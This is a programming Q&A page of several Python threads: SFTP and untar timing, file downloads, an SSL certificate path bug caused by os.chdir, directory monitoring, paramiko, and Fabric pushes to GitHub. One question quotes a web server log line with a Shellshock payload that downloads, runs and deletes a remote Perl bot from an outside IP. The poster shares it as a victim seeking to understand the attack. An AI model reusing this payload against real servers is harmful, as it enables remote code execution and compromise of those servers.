Facing Timing Issues: SFTPing tar file and uncompressing in python - python

I am trying to tar set of folders containing xml files from a specific location on the remote server and trying to copy it locally and un-tarrring the same in python.
tared the file using the command tar -cvf
used the following code in Python to sftp the tarred file:
sftp = ssh.open_sftp()
sftp.get(remotePath, localPath, callback)
sftp.close()
ssh.close()
The callback function:
def callback(transferred, tobetransferred):
global transfer_complete
res = abs(tobetransferred - transferred)
if res == 0:
transfer_complete = True
I check for the flag transfer_complete to be true or wait till it becomes true snippet:
while transfer_complete == False:
time.sleep(1)
Problem faced here:
I sometimes get this error:
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
which seems to be more of a timing issue as i see the tar file is copied intact but still it says could not untar. I see this problem for every 20-30 retries.
Is there an efficient way of doing this and removing this timing issue? Because I think the file is being copied still and i try to untar it.

Related

Specify a download path usig wget module in python

I'm trying to download files from a site using the wget module.
The code is really simple:
image = 'linkoftheimage'
wget.download(image)
This works fine, but it saves the file in the folder with the python script. My goal is to download it in a different folder, but I can't find a way to specify it.
I tried a different approach with os module .
os.system(f'wget -O {directory} {image}')
This metod gives me an error: sh: -c: line 0: syntax error near unexpected token `('
So I tried another method:
with open(f'{directory}/photo %s.jpg' %a,'wb') as handler:
handler.write(image)
This also didn't worked out.
Does anyone have an idea on how could I solve this?
the package you specified has not been updated since 2015, it's repository is gone and so should probably be avoided. you can download files using the built-in requests module like so:
import requests
image_url = 'https://www.fillmurray.com/200/300'
file_destination = 'desired/destination/file.jpg'
res = requests.get(image_url)
if res.status_code == 200: # http 200 means success
with open(file_destination, 'wb') as file_handle: # wb means Write Binary
file_handle.write(res.content)

FileNotFoundError When file exists (when created in current script)

I am trying to create a secure (e.g., SSL/HTTPS) XML-RPC Client Server. The client-server part works perfectly when the required certificates are present on my system; however, when I try to create the certificates during execution, I receive a FileNotFoundError when opening the ssl-wrapped socket even though the certificates are clearly present (because the preceding function created them.)
Why is the FileNotFoundError given when the files are present? (If I simply close and restart the python script no error is produced when opening the socket and everything works with no issue whatsoever.)
I've searched elsewhere for solutions, but the best/closest answer I've found is, perhaps, "race conditions" between creating the certificates and opening them. However, I've tried adding "sleep" to alleviate the possibility of race conditions (as well as running each function individually via a user input menu) with the same error every time.
What I am missing?
Here is a snippet of my code:
import os
import threading
import ssl
from xmlrpc.server import SimpleXMLRPCServer
import certs.gencert as gencert # <---- My python module for generating certs
...
rootDomain = "mydomain"
CERTFILE = "certs/mydomain.cert"
KEYFILE = "certs/mydomain.key"
...
def listenNow(ipAdd, portNum, serverCert, serverKey):
# Create XMLRPC Server, based on ipAdd/port received
server = SimpleXMLRPCServer((ipAdd, portNum))
# **THIS** is what causes the FileNotFoundError ONLY if
# the certificates are created during THE SAME execution
# of the program.
server.socket = ssl.wrap_socket(server.socket,
certfile=serverCert,
keyfile=serverKey,
do_handshake_on_connect=True,
server_side=True)
...
# Start server listening [forever]
server.serve_forever()
...
# Verify Certificates are present; if not present,
# create new certificates
def verifyCerts():
# If cert or key file not present, create new certs
if not os.path.isfile(CERTFILE) or not os.path.isfile(KEYFILE):
# NOTE: This [genert] will create certificates matching
# the file names listed in CERTFILE and KEYFILE at the top
gencert.gencert(rootDomain)
print("Certfile(s) NOT present; new certs created.")
else:
print("Certfiles Verified Present")
# Start a thread to run server connection as a daemon
def startServer(hostIP, serverPort):
# Verify certificates present prior to starting server
verifyCerts()
# Now, start thread
t = threading.Thread(name="ServerDaemon",
target=listenNow,
args=(hostIP,
serverPort,
CERTFILE,
KEYFILE
)
)
t.daemon = True
t.start()
if __name__ == '__main__':
startServer("127.0.0.1", 12345)
time.sleep(60) # <--To allow me to connect w/client before closing
When I run the above, with NO certificates present, this is the error I receive:
$ python3 test.py
Certfile(s) NOT present; new certs created.
Exception in thread ServerDaemon:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/usr/lib/python3.5/threading.py", line 862, in run
self._target(*self._args, **self._kwargs)
File "test.py", line 41, in listenNow
server_side=True)
File "/usr/lib/python3.5/ssl.py", line 1069, in wrap_socket
ciphers=ciphers)
File "/usr/lib/python3.5/ssl.py", line 691, in __init__
self._context.load_cert_chain(certfile, keyfile)
FileNotFoundError: [Errno 2] No such file or directory
When I simply re-run the script a second time (i.e., the cert files are already present when it starts, everything runs as expected with NO errors, and I can connect my client just fine.
$ python3 test.py
Certfiles Verified Present
What is preventing the ssl.wrap_socket function from seeing/accessing the files that were just created (and thus producing the FileNotFoundError exception)?
EDIT 1:
Thanks for the comments John Gordon. Here is a copy of gencert.py, courtesy of Atul Varm, found here https://gist.github.com/toolness/3073310
import os
import sys
import hashlib
import subprocess
import datetime
OPENSSL_CONFIG_TEMPLATE = """
prompt = no
distinguished_name = req_distinguished_name
req_extensions = v3_req
[ req_distinguished_name ]
C = US
ST = IL
L = Chicago
O = Toolness
OU = Experimental Software Authority
CN = %(domain)s
emailAddress = varmaa#toolness.com
[ v3_req ]
# Extensions to add to a certificate request
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = #alt_names
[ alt_names ]
DNS.1 = %(domain)s
DNS.2 = *.%(domain)s
"""
MYDIR = os.path.abspath(os.path.dirname(__file__))
OPENSSL = '/usr/bin/openssl'
KEY_SIZE = 1024
DAYS = 3650
CA_CERT = 'ca.cert'
CA_KEY = 'ca.key'
# Extra X509 args. Consider using e.g. ('-passin', 'pass:blah') if your
# CA password is 'blah'. For more information, see:
#
# http://www.openssl.org/docs/apps/openssl.html#PASS_PHRASE_ARGUMENTS
X509_EXTRA_ARGS = ()
def openssl(*args):
cmdline = [OPENSSL] + list(args)
subprocess.check_call(cmdline)
def gencert(domain, rootdir=MYDIR, keysize=KEY_SIZE, days=DAYS,
ca_cert=CA_CERT, ca_key=CA_KEY):
def dfile(ext):
return os.path.join('domains', '%s.%s' % (domain, ext))
os.chdir(rootdir)
if not os.path.exists('domains'):
os.mkdir('domains')
if not os.path.exists(dfile('key')):
openssl('genrsa', '-out', dfile('key'), str(keysize))
# EDIT 3: mydomain.key gets output here during execution
config = open(dfile('config'), 'w')
config.write(OPENSSL_CONFIG_TEMPLATE % {'domain': domain})
config.close()
# EDIT 3: mydomain.config gets output here during execution
openssl('req', '-new', '-key', dfile('key'), '-out', dfile('request'),
'-config', dfile('config'))
# EDIT 3: mydomain.request gets output here during execution
openssl('x509', '-req', '-days', str(days), '-in', dfile('request'),
'-CA', ca_cert, '-CAkey', ca_key,
'-set_serial',
'0x%s' % hashlib.md5(domain +
str(datetime.datetime.now())).hexdigest(),
'-out', dfile('cert'),
'-extensions', 'v3_req', '-extfile', dfile('config'),
*X509_EXTRA_ARGS)
# EDIT 3: mydomain.cert gets output here during execution
print "Done. The private key is at %s, the cert is at %s, and the " \
"CA cert is at %s." % (dfile('key'), dfile('cert'), ca_cert)
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s <domain-name>" % sys.argv[0]
sys.exit(1)
gencert(sys.argv[1])
EDIT 2:
Regarding John's comment, "this might mean that those files are being created, but not in the directory [I] expect":
When I have the directory open in another window, I see the files pop up in the correct location during execution. In addition, when running the test.py script a second time with no changes, the files are identified as present in the correct (the same) location. This leads me to believe that file location is not the problem. Thanks for the suggestion. I'll keep looking.
EDIT 3:
I stepped through the gencert.py program, and each of the files are correctly output at the right time during execution. I indicated when exactly they were output within the above file, labeled with "EDIT 3"
While gencert is paused awaiting my input (raw_input), I can open/view/edit the mentioned files in another program with no problem.
In addition, with the first test.py instance running (paused, waiting for user input, just after mydomain.cert appears), I can run a second instance of test.py in another terminal and it sees/uses the files just fine.
Within the first instance, however, if I continue the program it outputs "FileNotFoundError."
The problem contained in the above stems from the use of os.chdir(rootdir) as suggested by John; however, the specifics are slightly different than the created files being in the wrong location. The problem is the current working directory (cwd) of the running program being changed by gencert(). Here are the specifics:
The program is started with test.py, which calls verifyCerts(). At this point the program is running in the current directory of whichever folder test.py is running inside of. Use os.getcwd() to find the current directory at this point. In this case (as an example), it is running in:
/home/name/testfolder/
Next, os.path.isfile() looks for the files "certs/mydomain.cert" and "certs/mydomain.key"; based on the file path above [e.g., the cwd], it is looking for the following files:
/home/name/testfolder/certs/mydomain.cert
/home/name/testfolder/certs/mydomain.key
The above files are not present, so the program executes gencert.gencert(rootDomain) which correctly creates both files as expected in the exact locations mentioned above in number 2.
The problem is indeed the os.chdir() call: When gencert() executes, it uses os.chdir() to change the cwd to "rootdir," which is os.path.abspath(os.path.dirname(__file__)), which is the directory of the current file (gencert.py). Since this file is located a folder deeper, the new cwd becomes:
/home/name/testfolder/certs/
When gencert() finishes execution and the control returns to test.py, the cwd never changes again; the cwd remains as /home/name/testfolder/certs/ even when execution returns to test.py.
Later, when ssl.wrap_socket() tries to find the serverCert and serverKey, it looks for "certs/mydomain.cert" and "certs/mydomain.key" in the cwd, so here is the full path of what it is looking for:
/home/name/testfolder/certs/certs/mydomain.cert
/home/name/testfolder/certs/certs/mydomain.key
These two files are NOT present, so the program correctly returns "FileNotFoundError".
Solution
A) Move the "gencert.py" file to the same directory as "test.py"
B) At the beginning of "gencert.py" add cwd = os.getcwd() to record the original cwd of the program; then, at the very end, add os.chdir(cwd) to change back to the original cwd before ending and giving control back to the calling program.
I went with option 'B', and my program now works flawlessly. I appreciate the assistance from John Gordon to point me toward finding the source of my problem.

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.
I got some solution,
solution 1 (CPU usage: 27.9% approx= 30%):
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
after = dict ([(f, None) for f in os.listdir (path_to_watch)])
added = [f for f in after if not f in before]
if added:
print("Added: ", ", ".join (added))
break
else:
before = after
I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was made in python 2x so you need to convert it in python 3.
NOTE:-
WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.
Solution 2 (CPU usage: 23.4 approx=20%)
import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
while 1:
b=os.listdir(path)
path_len_final=len(b)
if path_len_org<path_len_final:
return "A file is added"
elif path_len_org>path_len_final:
return "A file is removed"
else:
pass
file_check()

Getting WindowsError when trying ot copy a file from one directory to another w/ paramiko

Good afternoon,
I am getting the following error whenever I am trying to copy a test file from one directory to another on a remote server:
Traceback (most recent call last):
File "", line 1, in
File "C:\Python27\lib\site-packages\paramiko-1.12.0-py2.7.egg\paramiko\sftp_client.py", line 612, in put
file_size = os.stat(localpath).st_size
WindowsError: [Error 3] The system cannot find the path specified: '/brass/prod/bin/chris/test1/km_cust'
The file I am looking to copy is called km_cust.
I am executing these commands in python 2.7.
Please note that the hostname, uid, and password were changed to generic versions and the real hostname, uid, and password can be used to ssh to the box in question and preform all functionality.
Here is my code:
import paramiko
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.connect('hostname',username='test',password='pw')
filepath = '/brass/prod/bin/chris/test1/km_cust'
localpath = 'brass/prod/bin/chris/test2'
sftp = s.open_sftp()
sftp.put(filepath, localpath)
Any help will be apprecaited. Let me know if any other information is needed.
The problem is that put copies a local file—that is, a file n your Windows box—to the server. As the documentation says:
put(self, localpath, remotepath, callback=None, confirm=True)
Copy a local file (localpath) to the SFTP server as remotepath.
Note that you're also specifying (or at least naming) the paths backward… but that doesn't really matter here, because neither one is actually a local path. So when you do this:
sftp.put(filepath, localpath)
… it's looking for a file named '/brass/prod/bin/chris/test1/km_cust' on your Windows box, and of course it can't find such a file.
If you want to copy a remote file to a different remote file, you need to do something like this:
f = sftp.open(filepath)
sftp.putfo(f, localpath)
Or:
f = sftp.open(localpath, 'wx')
sftp.getfo(filepath, f)
Also, I'm guessing your filepath is supposed to start with a /.
However, this probably isn't what you wanted to do in the first place. Copying a file from the remote server to the remote server via sftp involves downloading all of the bytes to your Windows machine and then uploading them back to the remote machine. A better solution would be to just tell the machine to do the copy itself:
s.exec_command("cp '{}' '{}'".format(filepath, localfile))
s.close()
Note that in anything but the most trivial of cases, you're going to have to deal with the Channel and its in/out/err and wait on its exit status. But I believe that for this case, you should be fine.

How do you define the host for Fabric to push to GitHub?

Original Question
I've got some python scripts which have been using Amazon S3 to upload screenshots taken following Selenium tests within the script.
Now we're moving from S3 to use GitHub so I've found GitPython but can't see how you use it to actually commit to the local repo and push to the server.
My script builds a directory structure similar to \images\228M\View_Use_Case\1.png in the workspace and when uploading to S3 it was a simple process;
for root, dirs, files in os.walk(imagesPath):
for name in files:
filename = os.path.join(root, name)
k = bucket.new_key('{0}/{1}/{2}'.format(revisionNumber, images_process, name)) # returns a new key object
k.set_contents_from_filename(filename, policy='public-read') # opens local file buffers to key on S3
k.set_metadata('Content-Type', 'image/png')
Is there something similar for this or is there something as simple as a bash type git add images command in GitPython that I've completely missed?
Updated with Fabric
So I've installed Fabric on kracekumar's recommendation but I can't find docs on how to define the (GitHub) hosts.
My script is pretty simple to just try and get the upload to work;
from __future__ import with_statement
from fabric.api import *
from fabric.contrib.console import confirm
import os
def git_server():
env.hosts = ['github.com']
env.user = 'git'
env.passowrd = 'password'
def test():
process = 'View Employee'
os.chdir('\Work\BPTRTI\main\employer_toolkit')
with cd('\Work\BPTRTI\main\employer_toolkit'):
result = local('ant viewEmployee_git')
if result.failed and not confirm("Tests failed. Continue anyway?"):
abort("Aborting at user request.")
def deploy():
process = "View Employee"
os.chdir('\Documents and Settings\markw\GitTest')
with cd('\Documents and Settings\markw\GitTest'):
local('git add images')
local('git commit -m "Latest Selenium screenshots for %s"' % (process))
local('git push -u origin master')
def viewEmployee():
#test()
deploy()
It Works \o/ Hurrah.
You should look into Fabric. http://docs.fabfile.org/en/1.4.1/index.html. Automated server deployment tool. I have been using this quite some time, it works pretty fine.
Here is my one of the application which uses it, https://github.com/kracekumar/sachintweets/blob/master/fabfile.py
It looks like you can do this:
index = repo.index
index.add(['images'])
new_commit = index.commit("my commit message")
and then, assuming you have origin as the default remote:
origin = repo.remotes.origin
origin.push()

Categories